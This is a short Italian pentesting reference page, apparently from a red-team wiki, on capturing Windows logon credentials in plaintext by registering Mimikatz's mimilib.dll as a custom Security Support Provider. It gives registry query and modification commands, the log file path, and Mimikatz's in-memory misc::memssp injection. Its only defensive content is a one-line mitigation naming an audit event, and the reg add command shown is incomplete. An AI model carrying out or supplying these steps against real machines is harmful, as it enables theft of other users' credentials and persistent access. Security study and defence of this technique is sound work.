SSP personalizzato

Scopri cosa è un SSP (Security Support Provider) qui. Puoi creare il tuo SSP per catturare in testo normale le credenziali utilizzate per accedere alla macchina.

Mimilib

Puoi utilizzare il binario mimilib.dll fornito da Mimikatz. Questo registrerà all'interno di un file tutte le credenziali in testo normale. Rilascia la dll in C:\Windows\System32\ Ottieni un elenco dei pacchetti di sicurezza LSA esistenti:

PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u

Aggiungi mimilib.dll all'elenco dei provider di supporto alla sicurezza (Security Packages):

reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"

E dopo un riavvio tutte le credenziali possono essere trovate in chiaro nel file C:\Windows\System32\kiwissp.log

In memoria

Puoi anche iniettare questo direttamente in memoria usando Mimikatz (nota che potrebbe essere un po' instabile/non funzionante):

privilege::debug
misc::memssp

Questo non sopravviverà ai riavvii.

Mitigazione

Event ID 4657 - Audit della creazione/modifica di HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages